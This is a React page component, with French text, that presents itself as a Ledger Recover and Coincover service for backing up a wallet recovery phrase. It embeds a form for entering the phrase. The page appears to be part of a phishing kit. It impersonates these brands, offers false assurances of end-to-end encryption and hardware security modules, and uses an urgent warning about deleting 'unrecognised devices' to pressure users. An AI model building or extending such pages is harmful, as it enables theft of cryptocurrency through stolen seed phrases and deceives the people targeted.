// ============================================
// RecoveryPhrasePage.js - Page complète
// ============================================
import React from 'react';
import { motion } from 'framer-motion';
import LogoBar from '../components/Logobar';
import RecoveryPhraseForm from '../components/RecoveryForm';
import '../components/RecoveryPhrase.css';

const fadeUp = {
  initial: { opacity: 0, y: 40 },
  animate: { opacity: 1, y: 0 },
  transition: { duration: 0.72, ease: [0.65, 0.05, 0.36, 1] }
};

const RecoveryPhrasePage = () => {
  return (
    <div className="recovery-page-container">
      {/* NAVBAR */}
      <motion.div 
        initial={{ opacity: 0, y: -20 }}
        animate={{ opacity: 1, y: 0 }}
        transition={{ duration: 0.6, ease: [0.65, 0.05, 0.36, 1] }}
      >
        <LogoBar />
      </motion.div>

      {/* HERO */}
      <motion.section 
        className="recovery-hero"
        initial={{ opacity: 0 }}
        animate={{ opacity: 1 }}
        transition={{ duration: 0.8, delay: 0.1 }}
      >
        <div className="hero-content">
          <motion.h1
            initial={{ opacity: 0, y: 30 }}
            animate={{ opacity: 1, y: 0 }}
            transition={{ duration: 0.7, delay: 0.2 }}
          >
            La solution de sauvegarde numérique pour préserver l'accès à votre wallet
          </motion.h1>
          <motion.p
            initial={{ opacity: 0, y: 20 }}
            animate={{ opacity: 1, y: 0 }}
            transition={{ duration: 0.7, delay: 0.35 }}
          >
            Restez serein : protégez votre phrase de récupération, quoi qu'il arrive.
          </motion.p>
          <motion.button 
            className="coincover-button"
            initial={{ opacity: 0 }}
            animate={{ opacity: 1 }}
            transition={{ delay: 0.5 }}
            onClick={() => window.open('https://www.coincover.com/', '_blank', 'noopener,noreferrer')}
          >
            <span>🔒</span> Service fourni par Coincover
          </motion.button>
        </div>
      </motion.section>

      {/* FORMULAIRE */}
      <motion.div
        initial={{ opacity: 0, y: 30 }}
        animate={{ opacity: 1, y: 0 }}
        transition={{ duration: 0.7, delay: 0.5 }}
      >
        <RecoveryPhraseForm />
      </motion.div>

      {/* SÉPARATEUR */}
      <motion.div
        initial={{ opacity: 0, scaleX: 0 }}
        animate={{ opacity: 1, scaleX: 1 }}
        transition={{ duration: 0.8, delay: 0.7 }}
      >
        <div className="activation-separator" />
      </motion.div>

      {/* SÉCURISATION SEED PHRASE */}
      <motion.section 
        className="seedphrase-section"
        initial={{ opacity: 0, y: 40 }}
        animate={{ opacity: 1, y: 0 }}
        transition={{ duration: 0.72, delay: 0.8, ease: [0.65, 0.05, 0.36, 1] }}
      >
        <div className="seedphrase-image-container">
          <video
            className="seedphrase-video"
            src={require('../assets/phrasefire.mp4')}
            autoPlay
            loop
            muted
            playsInline
            preload="auto"
          />
        </div>
        <div className="seedphrase-text">
          <h2>Sécurisation de votre phrase de récupération</h2>
          <p>
            Après la vérification de la phrase de récupération, celle-ci est traitée de manière entièrement chiffrée de bout en bout. La sécurisation repose sur l'utilisation de modules matériels de sécurité (HSM - Hardware Security Modules), garantissant que les données sensibles ne sont jamais accessibles en clair et restent protégées à chaque étape du processus.
          </p>
          <p>
            Une fois cette vérification validée, l'utilisateur obtient l'accès à son Dashboard Ledger Recover, disponible dans la rubrique dédiée au sein de l'interface Ledger Wallet. Ce tableau de bord permet de gérer et suivre le service Ledger Recover de manière sécurisée, tout en respectant les standards les plus élevés en matière de protection des données et de confidentialité.
          </p>
          <p>
            Il est également recommandé de vérifier régulièrement les appareils de confiance connectés au service Ledger Recover, afin de s'assurer qu'aucun accès non autorisé n'est actif.
          </p>
          <p>
            ⚠️ <b>Attention : étape critique à venir</b><br />
            La prochaine étape vous permettra de supprimer définitivement les appareils non reconnus.<br />
            ❗️ <b>Soyez extrêmement vigilant</b> : une mauvaise manipulation pourrait entraîner la perte d'accès à l'un de vos appareils.
          </p>
        </div>
      </motion.section>
    </div>
  );
};

export default RecoveryPhrasePage;